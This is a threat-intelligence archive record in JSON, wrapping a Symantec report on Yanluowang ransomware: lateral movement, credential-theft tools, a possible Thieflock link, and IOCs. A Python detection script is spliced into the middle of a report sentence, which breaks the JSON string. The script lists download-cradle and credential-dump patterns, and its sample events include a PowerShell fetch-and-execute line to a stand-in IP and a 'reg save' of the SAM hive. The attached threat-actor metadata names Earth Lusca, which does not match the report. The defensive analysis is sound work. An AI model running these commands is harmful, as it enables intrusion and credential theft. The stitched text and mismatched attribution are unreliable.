{
	"id": "59da283a-2855-4f4a-8c9e-be28312614b9",
	"created_at": "2026-04-06T01:32:27.906959Z",
	"updated_at": "2026-04-10T03:36:47.863268Z",
	"deleted_at": null,
	"sha1_hash": "933fddcfd431eb68dc5a5918d34ad5a613d22177",
	"title": "Yanluowang: Further Insights on New Ransomware Threat",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 39821,
	"plain_text": "Yanluowang: Further Insights on New Ransomware Threat\r\nArchived: 2026-04-06 00:31:17 UTC\r\nYanluowang, the ransomware recently discovered by Symantec, a division of Broadcom Software, is now being\r\nused by a threat actor that has been mounting targeted attacks against U.S. corporations since at least August 2021.\r\nThe attacker uses a number of tactics, techniques, and procedures (TTPs) that were previously linked to Thieflock\r\nransomware attacks, suggesting that they may be a former Thieflock affiliate who shifted allegiance to the new\r\nYanluowang ransomware family.\r\nThe attackers have been heavily focused on organizations in the financial sector but have also targeted companies\r\nin the manufacturing, IT services, consultancy, and engineering sectors.\r\nLateral movement\r\nIn most cases, PowerShell is used to download tools to compromised systems, including BazarLoader to assist in\r\nreconnaissance. The attackers then enable RDP through a registry change to obtain remote access. 
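The lateral-movement steps above lend themselves to a detection check. The following is an added example, not code from the Symantec report or from any vendor product: a Python pass over constructed process-creation records (the kind Sysmon event 1 or Windows Security event 4688 produce) that flags a PowerShell download cradle, RDP enabled by setting fDenyTSConnections to 0, and credential hives exported with reg.exe. The event fields, the marker substrings, the host and user names and every command line are assumptions made for the example.

```python
# Added example, not code from the Symantec report: a small detection pass over
# process-creation records that flags three of the TTPs described above, a
# PowerShell download cradle, RDP enabled through the registry
# (fDenyTSConnections set to 0) and credential hives dumped with reg.exe.
# Field names, marker lists and the sample command lines are all constructed.
from dataclasses import dataclass

BS = chr(92)  # one backslash, spelled this way so the samples carry no escape sequences


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    image: str         # full path of the created process
    command_line: str  # as logged by Sysmon event 1 or Security event 4688


# substrings that indicate PowerShell fetching a payload from the network (assumed list)
DOWNLOAD_CRADLE_MARKERS = (
    'downloadstring', 'downloadfile', 'invoke-webrequest', 'iwr ',
    'net.webclient', 'start-bitstransfer', 'invoke-restmethod',
)
# hives that hold local secrets; SAM needs SYSTEM for the boot key
SECRET_HIVES = ('hklm/sam', 'hklm/security', 'hklm/system')


def _norm(text):
    # lower-case and fold backslashes to slashes so paths compare the same
    return text.lower().replace(BS, '/')


def _image_name(image):
    return _norm(image).rsplit('/', 1)[-1]


def _value_after(tokens, flag):
    # the token following a reg.exe /d or a Set-ItemProperty -Value switch, if any
    if flag in tokens:
        idx = tokens.index(flag)
        if idx + 1 < len(tokens):
            return tokens[idx + 1]
    return None


def classify(ev):
    '''Return the TTP labels the event matches (empty list when nothing matches).'''
    hits = []
    name = _image_name(ev.image)
    cmd = _norm(ev.command_line)
    tokens = cmd.split()

    # 1. PowerShell pulling a payload from the network
    if name in ('powershell.exe', 'pwsh.exe') and any(m in cmd for m in DOWNLOAD_CRADLE_MARKERS):
        hits.append('powershell_download_cradle')

    # 2. RDP switched on by writing fDenyTSConnections = 0 (reg.exe /d 0 or -Value 0)
    if 'fdenytsconnections' in cmd:
        if any(_value_after(tokens, flag) in ('0', '0x0') for flag in ('/d', '-value')):
            hits.append('rdp_enabled_via_registry')

    # 3. Local credential material exported from the registry
    if name == 'reg.exe' and 'save' in tokens and any(h in cmd for h in SECRET_HIVES):
        hits.append('registry_credential_dump')

    return hits


def scan(events):
    '''Group hits by host: {host: [(user, labels), ...]} for events with at least one label.'''
    findings = {}
    for ev in events:
        labels = classify(ev)
        if labels:
            findings.setdefault(ev.host, []).append((ev.user, labels))
    return findings


PS_IMAGE = f'C:{BS}Windows{BS}System32{BS}WindowsPowerShell{BS}v1.0{BS}powershell.exe'
REG_IMAGE = f'C:{BS}Windows{BS}System32{BS}reg.exe'

# constructed events in the order: cradle, RDP enable, hive dump, two benign
SAMPLE_EVENTS = [
    ProcessEvent('FIN-WS-042', 'CORP/j.doe', PS_IMAGE,
                 'powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(http://203.0.113.7/bl.ps1)'),
    ProcessEvent('FIN-WS-042', 'CORP/j.doe', PS_IMAGE,
                 f'''powershell.exe -c Set-ItemProperty -Path 'HKLM:{BS}SYSTEM{BS}CurrentControlSet{BS}Control{BS}Terminal Server' -Name fDenyTSConnections -Value 0'''),
    ProcessEvent('FIN-WS-107', 'CORP/svc_backup', REG_IMAGE,
                 f'reg save HKLM{BS}SAM C:{BS}Windows{BS}Temp{BS}sam.hiv'),
    ProcessEvent('FIN-WS-220', 'CORP/a.smith', REG_IMAGE,
                 f'reg query HKLM{BS}SOFTWARE{BS}Microsoft{BS}Windows NT{BS}CurrentVersion /v ProductName'),
    ProcessEvent('FIN-WS-220', 'CORP/a.smith', PS_IMAGE,
                 'powershell.exe -c Get-Process | Sort-Object CPU'),
]

if __name__ == '__main__':
    for host, entries in scan(SAMPLE_EVENTS).items():
        for user, labels in entries:
            print(host, user, ', '.join(labels))
```

Run as a script it prints one line per flagged event. The fDenyTSConnections check is the most specific of the three predicates; the download-cradle markers will need tuning against whatever administrative scripting is normal in the environment, and the reg.exe save rule should be paired with the Security event 4656 or 4663 handle audits on the SAM key where those are enabled.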
After gaining initial access,\r\nthe attackers usually deploy ConnectWise (formerly known as ScreenConnect), a legitimate remote access tool.\r\nIn order to perform lateral movement and identify systems of interest, such as the victim’s Active Directory server,\r\nthe attackers deploy Adfind, a free tool that can be used to query Active Directory, and SoftPerfect Network\r\nScanner (netscan.exe), a publicly available tool used for discovery of hostnames and network services.\r\nThe next phase of the attack is credential theft and the attackers use a wide range of credential-stealing tools,\r\nincluding:\r\nGrabFF: A tool that can dump passwords from Firefox\r\nGrabChrome: A tool that can dump passwords from Chrome\r\nBrowserPassView: A tool that can dump passwords from Internet Explorer and a number of other browsers\r\nAlong with these tools, the attackers also use a number of open-source tools such as KeeThief, a PowerShell script\r\nto copy the master key from KeePass. In some cases, customized versions of open-source credential-dumping\r\ntools were also observed (secretsdump.exe). Credentials were also dumped from the registry.\r\nIn addition, the attackers have also used a number of other data capture tools, including a screen capture tool and a\r\nfile exfiltration tool (filegrab.exe). Cobalt Strike Beacon was also deployed against at least one targeted\r\norganization.\r\nOther tools used include ProxifierPE, which can be used to proxy connections back to attacker-controlled\r\ninfrastructure, and the free, Chromium-based Cent web browser.\r\nThe Thieflock connection\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue\r\nPage 1 of 3\n\nThere is a tentative link between these Yanluowang attacks and older attacks involving Thieflock, ransomware-as-a-service developed by the Canthroid (aka Fivehands) group. 
Several TTPs used by these attackers overlap with\r\nTTPs used in Thieflock attacks, including:\r\nUse of custom password recovery tools such as GrabFF and other open-source password dumping tools\r\nUse of open-source network scanning tools (SoftPerfect Network Scanner)\r\nUse of free browsers, such as s3browser and Cent browser\r\nThis link raises the question of whether Yanluowang was developed by Canthroid. However, analysis of\r\nYanluowang and Thieflock does not provide any evidence of shared authorship. Instead, the most likely\r\nhypothesis is that these Yanluowang attacks may be carried out by a former Thieflock affiliate.\r\nProtection\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\na710f573f73c163d54c95b4175706329db3ed89cd9337c583d0bb24b6a384789 – NetScan\r\n2c2513e17a23676495f793584d7165900130ed4e8cccf72d9d20078e27770e04 – Adfind\r\n43f8a66d3f3f1ba574bc932a7bc8e5886fbeeab0b279d1dea654d7119e80a494 – BazarLoader\r\n9aa1f37517458d635eae4f9b43cb4770880ea0ee171e7e4ad155bbdee0cbe732 – Veeamp\r\n85fb8a930fa7f4c32c8af86aa204eb4ea4ae404e670a8be17e7ae0adf37a9e2e – GrabFF\r\ne4942fde1cd7f2fcfb522090fd16298bce247295fe99182aecf7b10be3f5dc53 – ConnectwiseInstaller\r\nfe38912d64f6d196ac70673cd2edbdbc1a63e494a2d7903546a6d3afa39dc5c4 – WmiExecAgent\r\nc77ff8e3804414618abeae394d3003c4bb65a43d69c57c295f443aeb14eaa447 – NetScan\r\n2fc5bf9edcfa19d48e235315e8f571638c99a1220be867e24f3965328fe94a03 – Secretsdump\r\n4ff503258e23d609e0484ee5df70a1db080875272ab6b4db31463d93ebc3c6dd – GrabFile\r\n1c543ea5c50ef8b0b42f835970fa5f553c2ae5c308d2692b51fb476173653cb3 – GrabChrome\r\n0b9219328ebf065db9b26c9a189d72c7d0d9c39eb35e9fd2a5fefa54a7f853e4 – OpenChromeDumps\r\nb556d90b30f217d5ef20ebe3f15cce6382c4199e900b5ad2262a751909da1b34 – BrowserPassView\r\n5e03cea2e3b875fdbf1c142b269470a9e728bcfba1f13f4644dcc06d10de8fb4 – ConHost\r\n49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d – 
Yanluowang\r\nmyeeducationplus.com\r\n185.53.46.115\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue"
	],
	"report_names": [
		"yanluowang-ransomware-attacks-continue"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439147,
	"ts_updated_at": 1775792207,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/933fddcfd431eb68dc5a5918d34ad5a613d22177.pdf",
		"text": "https://archive.orkl.eu/933fddcfd431eb68dc5a5918d34ad5a613d22177.txt",
		"img": "https://archive.orkl.eu/933fddcfd431eb68dc5a5918d34ad5a613d22177.jpg"
	}
}